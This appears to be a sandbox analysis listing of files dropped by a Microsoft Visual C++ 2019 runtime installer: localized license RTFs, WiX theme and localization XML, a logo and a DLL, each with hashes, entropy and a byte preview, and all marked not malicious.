Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Instala..o</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Tem certeza de que deseja cancelar?</String>.. <String Id="HelpHeader">Ajuda da Instala..o</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [diret.rio - instala, repara, desinstala ou.. cria uma c.pia local completa do pacote no diret.rio. Install . o padr.o..../passive \| /quiet - exibe a IU m.nima sem nenhum prompt ou n.o exibe nenhuma IU e.. nenhum prompt. Por padr.o, a IU e todos os prompts s.o exibidos...../norestart - suprime qualquer tentativa de reiniciar. Por padr.o, a IU perguntar. antes de reiniciar

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1049\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	31915
Entropy (8bit):	3.6440775919653996
Encrypted:	false
SSDEEP:	384:ntaMxngQEqQUaAEJxkSjjujcme51oVwuZOFsrnkGxunWxGc9wtvVYgCzkSxN1S2:npgnmWWNEvVYgCzxD
MD5:	A59C893E2C2B4063AE821E42519F9812
SHA1:	C00D0B11F6B25246357053F6620E57D990EFC698
SHA-256:	0EC8368E87B3DFC92141885A2930BDD99371526E09FC52B84B764C91C5FC47B8
SHA-512:	B9AD8223DDA2208EC2068DBB85742A03BE0291942E60D4498E3DAB4DDF559AA6DCF9879952F5819223CFC5F4CB71D4E06E4103E129727AACFB8EFE48403A04FA
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset204 Tahoma;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset204 Garamond;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang1049\'d3\'d1\'cb\'ce\'c2\'c8\'df \'cb\'c8\'d6\'c5\'cd\'c7\'c8\'c8 \'cd\'c0 \'cf\'d0\'ce\'c3\'d0\'c0\'cc\'cc\'cd\'ce\'c5 \'ce\'c1\'c5\'d1\'cf\'c5\'d7\'c5\'cd\'c8\'c5 MICROSOFT\par..\f1\lang9 MICROSOFT VISUAL C++ 2019 RUNTIME\par..\b0\f0\lang1049\'cd\'e0\'f1\'f2\'ee\'ff\'f9\'e8\'e5 \'f3\'f1\'eb\'ee\'e2\'e8\'ff \'eb\'e8\'f6\'e5\'ed\'e7\'e8\'e8 \'ff\'e2\'eb\'ff\'fe\'f2\'f1\'ff \'f1\'ee\'e3\'eb\'e0\'f8\'e5\'ed\'e8\'e5\'ec \'ec\'e5\'e6\'e4\'f3 \'ea\'ee\'f0\'ef\'ee\'f0\'e0\'f6\'e8\'e5\'e9 Microsoft (\'e8\'eb\'e8, \'e2 \'e7\'e0\'e2\'e8\'f1\'e8\'ec\'ee\'f1\'f2\'e8 \'ee\'f2 \'ec\'e5\'f1\'f2\'e0 \'e2\'e0\'f8\'e5\'e3\'ee \'ef\'f0\'ee\'e6\'e8\'e2\'e0\'ed\'e8\'ff, \'ee\

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1049\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	4150
Entropy (8bit):	5.444436038992627
Encrypted:	false
SSDEEP:	48:c5DiTlDhQt9esbrohDTWJt49kAr7DHN3m5GNDCNvNLIkflhrWncPingGdZwK1Kqp:uDiTlDYVgmt4xJ88k193ipzjvL
MD5:	17C652452E5EE930A7F1E5E312C17324
SHA1:	59F3308B87143D8EA0EA319A1F1A1F5DA5759DD3
SHA-256:	7333BC8E52548821D82B53DBD7D7C4AA1703C85155480CB83CEFD78380C95661
SHA-512:	53FD207B96D6BCF0A442E2D90B92E26CBB3ECC6ED71B753A416730E8067E831E9EB32981A9E9368C4CCA16AFBCB2051483FDCFC474EA8F0D652FCA934634FBE8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.... <String Id="Caption">......... ......... [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">....... .. .........</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [.......] - ........., .............., ........ ..... ........ ...... ......... ..... ...... . ......... .. ......... - ............../passive \| /quiet - ........... ....

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1055\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	13379
Entropy (8bit):	5.214715951393874
Encrypted:	false
SSDEEP:	192:1fGkc01jIjZTUDUTvXt2QpfC5VAlCPpDwuOfH7df3YwnnbZIWG2XjQeoO9uBO8CA:Iiqx4Uh2QpMVA8haDdv9nbZzG6oQR2
MD5:	BD2DC15DFEE66076BBA6D15A527089E7
SHA1:	8768518F2318F1B8A3F8908A056213042A377CC4
SHA-256:	62A07232017702A32F4B6E43E9C6F063B67098A1483EEDDB31D7C73EAF80A6AF
SHA-512:	9C9467A2F2D0886FF4302A44AEA89734FCEFBD3CBE04D895BCEACBA1586AB746E62391800E07B6228E054014BE51F14FF63BA71237268F94019063C8C8B7EF74
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT YAZILIMI L\f1\u304?SANS KO\'aaULLARI\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Bu lisans ko\f1\'baullar\u305?, Microsoft Corporation (veya ya\'baad\u305?\u287?\u305?n\u305?z yere g\f0\'f6re bir ba\f1\u287?l\u305? \'bairketi) ile sizin aran\u305?zda yap\u305?lan anla\'bamay\u305? olu\'baturur. Bu ko\'baullar, yukar\u305?da ad\u305? ge\f0\'e7en yaz\f1\u305?l\u305?m i\f0\'e7in ge\'e7erlidir. \f1\'aaartlar, yaz\u305?l\u305?m i\f0\'e7in t\'fcm Microsoft hizmetleri veya g\'fcncelle\f1\'batirmeleri i\f0\'e7in, beraberlerinde farkl\f1\u305? \'baartlar bulunmad\u305?\u287?\u305? s\f0\'fcrece ge\'e7erlidir.\par..\b BU L\f1\u304?SANS \'aaARTLARINA UYDU\u286?UNUZ TAKD\u304?RDE A\'aaA\u286?IDAK\u3

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1055\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3221
Entropy (8bit):	5.280530692056262
Encrypted:	false
SSDEEP:	48:c5DiTlOaesHEqhDTHV4zVy6oBzdp0DYK2GP2ZmN3majyNXNoNKQXVvChcPc+WKb0:uDiTl3PHcIflKNTPgdi12xgg
MD5:	DEFBEA001DC4EB66553630AC7CE47CCA
SHA1:	90CED64EC7C861F03484B5D5616FDBCDA8F64788
SHA-256:	E5ABE3CB3BF84207DAC4E6F5BBA1E693341D01AEA076DD2D91EAA21C6A6CB925
SHA-512:	B3B7A22D0CDADA21A977F1DCEAF2D73212A4CDDBD298532B1AC97575F36113D45E8D71C60A6D8F8CC2E9DBF18EE1000167CFBF0B2E7ED6F05462D77E0BCA0E90
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Kurulumu</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.ptal etmek istedi.inizden emin misiniz?</String>.. <String Id="HelpHeader">Kurulum Yard.m.</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [dizin] - y.kler, onar.r, kald.r.r ya da.. dizindeki paketin tam bir yerel kopyas.n. olu.turur. Varsay.lan install de.eridir...../passive \| /quiet - en az d.zeyde istemsiz UI g.sterir ya da hi. UI g.stermez ve.. istem yoktur. Varsay.lan olarak UI ve t.m istemler g.r.nt.lenir...../norestart - yeniden ba.lama denemelerini engeller. Varsay.lan olarak UI yeniden ba.l

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\2052\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	17863
Entropy (8bit):	3.9617786349452775
Encrypted:	false
SSDEEP:	192:BxoqPyOj+/8Tk5VigWgijAlk5xWvSCI5lgios0EhGXxGMLVGW+uUoqyLZDvAJxMx:vbIeaE7q3KGgzD2
MD5:	3CF16377C0D1B2E16FFD6E32BF139AC5
SHA1:	D1A8C3730231D51C7BB85A7A15B948794E99BDCE
SHA-256:	E95CA64C326A0EF7EF3CED6CDAB072509096356C15D1761646E3C7FDA744D0E0
SHA-512:	E9862FD0E8EC2B2C2180183D06535A16A527756F6907E6A1D2DB85092636F72C497508E793EE8F2CC8E0D1A5E090C6CCF465F78BC1FA8E68DAF7C68815A0EE16
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset134 SimSun;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'ce\'a2\'c8\'ed\'c8\'ed\'bc\'fe\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\f1\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f0\'d5\'e2\'d0\'a9\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\'ca\'c7\f1 Microsoft Corporation\f0\'a3\'a8\'bb\'f2\'c4\'fa\'cb\'f9\'d4\'da\'b5\'d8\'b5\'c4\f1 Microsoft \f0\'b9\'d8\'c1\'aa\'b9\'ab\'cb\'be\'a3\'a9\'d3\'eb\'c4\'fa\'d6\'ae\'bc\'e4\'b4\'ef\'b3\'c9\'b5\'c4\'d0\'ad\'d2\'e9\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'ca\'ca\'d3\'c3\'d3\'da\'c9\'cf\'ca\'f6\'c8\'ed\'bc\'fe\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'d2\'b2\'ca\'ca\'d3\'c3\'d3\'da\'d5\'eb\'b6\'d4\'b8\'c3\'c8\'ed\'bc\'fe\'b5\'c4\'c8\'ce\'ba\'ce\'ce\'a2\'c8\'ed\'b7\'fe\'ce\'f1\'bb\'f2\'b8\'fc\'d0\'c2\'a3\'ac\'b5\'ab\'d3\'d0\'b2\'bb\'cd\

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\2052\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2978
Entropy (8bit):	6.135205733555905
Encrypted:	false
SSDEEP:	48:c5DiTlOtKesi+hDtkQf7lz+W0gopN3m5+3cNONeN1ra8vWqPtlTKxKUTKlKXRoR+:uDiTlV5kQR9GLeE0ZxV6gIV
MD5:	3D1E15DEEACE801322E222969A574F17
SHA1:	58074C83775E1A884FED6679ACF9AC78ABB8A169
SHA-256:	2AC8B7C19A5189662DE36A0581C90DBAD96DF259EC00A28F609B644C3F39F9CA
SHA-512:	10797919845C57C5831234E866D730EBD13255E5BF8BA8087D53F1D0FC5D72DC6D5F6945DBEBEE69ACC6A2E20378750C4B78083AE0390632743C184532358E10
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">......</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [..] - .......... ..................Install ........../passive \| /quiet - ..... UI ......... UI ... ........ UI ........../norestart - ..................... UI.../log log.txt - ............. %TEMP% ...

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\3082\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	10714
Entropy (8bit):	5.122578090102117
Encrypted:	false
SSDEEP:	192:WthGE/9wd8eQF/hJOmQeNrXT77uOlQ+v3AqHqc3wpXGYdjvsk2cwBb2:mhGuhj+ed388Bb2
MD5:	FBF293EE95AFEF818EAF07BB088A1596
SHA1:	BBA1991BA6459C9F19B235C43A9B781A24324606
SHA-256:	1FEC058E374C20CB213F53EB3C44392DDFB2CAA1E04B7120FFD3FA7A296C83E2
SHA-512:	6971F20964EF74B19077EE81F953342DC6D2895A8640EC84855CECCEA5AEB581E6A628BCD3BA97A5D3ACB6CBE7971FDF84EF670BDDF901857C3CD28855212019
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 T\'c9RMINOS DE LA LICENCIA DE SOFTWARE DE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME\par..\b0 Estos t\'e9rminos de licencia constituyen un contrato entre Microsoft Corporation (o, en funci\'f3n de donde resida, una de sus filiales) y usted. Se aplican al software antes mencionado. Los t\'e9rminos tambi\'e9n se aplican a cualquier servicio o actualizaci\'f3n de Microsoft para el software, excepto en la medida que tengan t\'e9rminos diferentes.\par..\b SI USTED CUMPLE CON LOS PRESENTES T\'c9RMINOS DE ESTA LICENCIA, DISPONDR\'c1 DE LOS DERECHOS QUE SE DESCRIBEN A CONTINUACI\'d3N.\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\3082\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3265
Entropy (8bit):	5.0491645049584655
Encrypted:	false
SSDEEP:	48:c5DiTlO/esS6VGhDv4tiUiyRUqzC4U+aD6N3m7xNh1NWNGbPz+9o3PWeKK9K9KfT:uDiTlxouUTiySqyIwz9sgxqvjIk8
MD5:	47F9F8D342C9C22D0C9636BC7362FA8F
SHA1:	3922D1589E284CE76AB39800E2B064F71123C1C5
SHA-256:	9CBB2B312C100B309A1B1495E84E2228B937612885F7A642FBBD67969B632C3A
SHA-512:	E458DF875E9B0622AEBE3C1449868AA6A2826A1F851DB71165A872B2897CF870CCF85046944FF51FFC13BB15E54E9D9424EC36CAF5A2F38CE8B7D6DC0E9B2363
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalaci.n de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.Est. seguro de que desea cancelar la operaci.n?</String>.. <String Id="HelpHeader">Ayuda de configuraci.n</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - instala, repara, desinstala o.. crea una copia local completa del paquete en el directorio. La opci.n predeterminada es la instalaci.n...../passive \| /quiet - muestra una IU m.nima sin solicitudes o no muestra ninguna IU ni.. solicitud. De forma predeterminada, se muestran la IU y todas las solicitudes...../norestart - elimina cualquier intento

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\BootstrapperApplicationData.xml

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (591), with CRLF line terminators
Category:	dropped
Size (bytes):	13188
Entropy (8bit):	3.7269622731111123
Encrypted:	false
SSDEEP:	192:X0s1HBDnH5zHqQHG0Hd8Hz7HE06HA0rH3pEpzcxLU76zLG0LICrcBx7z8NkzzkvL:X0s19dLbmnoNAQkmJJruVEpJEo
MD5:	947CA1888D6B3E455B0C2481F85895E6
SHA1:	7FAD486E7D0BE3DB6252E07CA83A3C177D5D05BB
SHA-256:	F8E9CF237EB91588A02B0A77D6512AD0CF2ECCB18B54C375D6073B4C6133EFCF
SHA-512:	1498DE4C5BA1787C4AC57044677DCD04EB60AB341896DA6D5F13EE08CD07F4A26D01BB2EC7B2A2B0749A61DC3A2D6E4DA5E769F744A754A2FAA33795068DDC03
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.a.l.C.o.n.d.i.t.i.o.n. .C.o.n.d.i.t.i.o.n.=.".V.e.r.s.i.o.n.N.T.6.4. .&.g.t.;.=. .v.6...0. .O.R. .(.V.e.r.s.i.o.n.N.T.6.4. .=. .v.5...2. .A.N.D. .S.e.r.v.i.c.e.P.a.c.k.L.e.v.e.l. .&.g.t.;.=. .1.).". .M.e.s.s.a.g.e.=.".[.W.i.x.B.u.n.d.l.e.N.a.m.e.]. .c.a.n. .o.n.l.y. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .W.i.n.d.o.w.s. .X.P. .S.P.1. .(.x.6.4.). .a.n.d. .n.e.w.e.r. .p.l.a.t.f.o.r.m.s...". ./.>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.1.9. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.6.4.). .-. .1.4...2.5...2.8.5.0.8.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".y.e.

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	9046
Entropy (8bit):	5.157073875669985
Encrypted:	false
SSDEEP:	192:W8lZ1UVDWkgWZTIsvPhghtQ1Qf4lCfnEtHixEGx736wHqItfSpOy2:9T15WZMgAYlOnjt5HLoL2
MD5:	2EABBB391ACB89942396DF5C1CA2BAD8
SHA1:	182A6F93703549290BCDE92920D37BC1DEC712BB
SHA-256:	E3156D170014CED8D17A02B3C4FF63237615E5C2A8983B100A78CB1F881D6F38
SHA-512:	20D656A123A220CD3CA3CCBF61CC58E924B44F1F0A74E70D6850F39CECD101A69BCE73C5ED14018456E022E85B62958F046AA4BD1398AA27303C2E86407C3899
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT SOFTWARE LICENSE TERMS\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software, except to the extent those have different terms.\par..\b IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE RIGHTS BELOW.\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 INSTALLATION AND USE RIGHTS. \b0\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-363\

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\logo.png

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	PNG image data, 64 x 64, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1861
Entropy (8bit):	6.868587546770907
Encrypted:	false
SSDEEP:	24:q36cnTKM/3kTIQiBmYKHeQWalGt1Sj9kYIt1uZ+bYOQe0IChR95aW:qqiTKMPuUBm7eQJGtYJM1uZCVszaW
MD5:	D6BD210F227442B3362493D046CEA233
SHA1:	FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
SHA-256:	335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
SHA-512:	464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
Malicious:	false
Preview:	.PNG........IHDR...@...@.............sRGB.........gAMA......a.....PLTE].q^.r_.r_.s`.s`.s`.ta.ta.ub.ub.vc.vd.vd.vd.we.we.xe.xg.yg yg zh zh"zi"{j#\|i${j$\|n~n.n,.o,.p..q0.r2.s3.t5.x;.x<.y>.z?.\|B.~C.}E..F..F..H..I..J..L..O..P..W..Y..^..a..c..g..i..q..r..}.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................S......pHYs..%...%....^.....tEXtSoftware.Paint.NET v3.5.100.r.....IDATXG..iW.@...EJ.$M...`AEpG..7TpWT@\.."....(..(.._;...di:9.c>q..g....T...._...-....F..+..w.

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2952
Entropy (8bit):	5.052095286906672
Encrypted:	false
SSDEEP:	48:c5DiTl/+desK19hDUNKwsqq8+JIDxN3mt7NlN1NVvAdMcgLPDHVXK8KTKjKnSnYF:uDiTl/BbTxmup/vrxATd
MD5:	FBFCBC4DACC566A3C426F43CE10907B6
SHA1:	63C45F9A771161740E100FAF710F30EED017D723
SHA-256:	70400F181D00E1769774FF36BCD8B1AB5FBC431418067D31B876D18CC04EF4CE
SHA-512:	063FB6685EE8D2FA57863A74D66A83C819FE848BA3072B6E7D1B4FE397A9B24A1037183BB2FDA776033C0936BE83888A6456AAE947E240521E2AB75D984EE35E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29" />.... <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Are you sure you want to cancel?</String>.. <String Id="HelpHeader">Setup Help</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - installs, repairs, uninstalls or.. creates a complete local copy of the bundle in directory. Install is the default...../passive \| /quiet - displays minimal UI with no prompts or displays no UI and.. no prompts. By default UI and all prompts are displayed...../norestart - suppress any attempts to restart. By default UI will prompt before restart.../log log.txt - logs to a specific file. B

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\thm.xml

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	8332
Entropy (8bit):	5.184632608060528
Encrypted:	false
SSDEEP:	96:8L2HdQG+3VzHfz96zYFGaPSWXdhRAmImlqFQKFBiUxn7Ke5A82rkO/pWk3nswP:ZHAzZ/3
MD5:	F62729C6D2540015E072514226C121C7
SHA1:	C1E189D693F41AC2EAFCC363F7890FC0FEA6979C
SHA-256:	F13BAE0EC08C91B4A315BB2D86EE48FADE597E7A5440DCE6F751F98A3A4D6916
SHA-512:	CBBFBFA7E013A2B85B78D71D32FDF65323534816978E7544CA6CEA5286A0F6E8E7E5FFC4C538200211F11B94373D5658732D5D8AA1D01F9CCFDBF20F154F1471
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. Copyright (c) .NET Foundation and contributors. All rights reserved. Licensed under the Microsoft Reciprocal License. See LICENSE.TXT file in the project root for full license information. -->......<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Heig

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\wixstdba.dll

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	195600
Entropy (8bit):	6.682530937585544
Encrypted:	false
SSDEEP:	3072:OXoiFK6b0k77I+QfaIl191rSJHvlalB+8BHkY6v53EfcUzN0m6I+WxBlnKzeZuqt:OXoQNb++gDrSJdr8BHkPh3wIgnK/IU1a
MD5:	EAB9CAF4277829ABDF6223EC1EFA0EDD
SHA1:	74862ECF349A9BEDD32699F2A7A4E00B4727543D
SHA-256:	A4EFBDB2CE55788FFE92A244CB775EFD475526EF5B61AD78DE2BCDFADDAC7041
SHA-512:	45B15ADE68E0A90EA7300AEB6DCA9BC9E347A63DBA5CE72A635957564D1BDF0B1584A5E34191916498850FC7B3B7ECFBCBFCB246B39DBF59D47F66BC825C6FD2
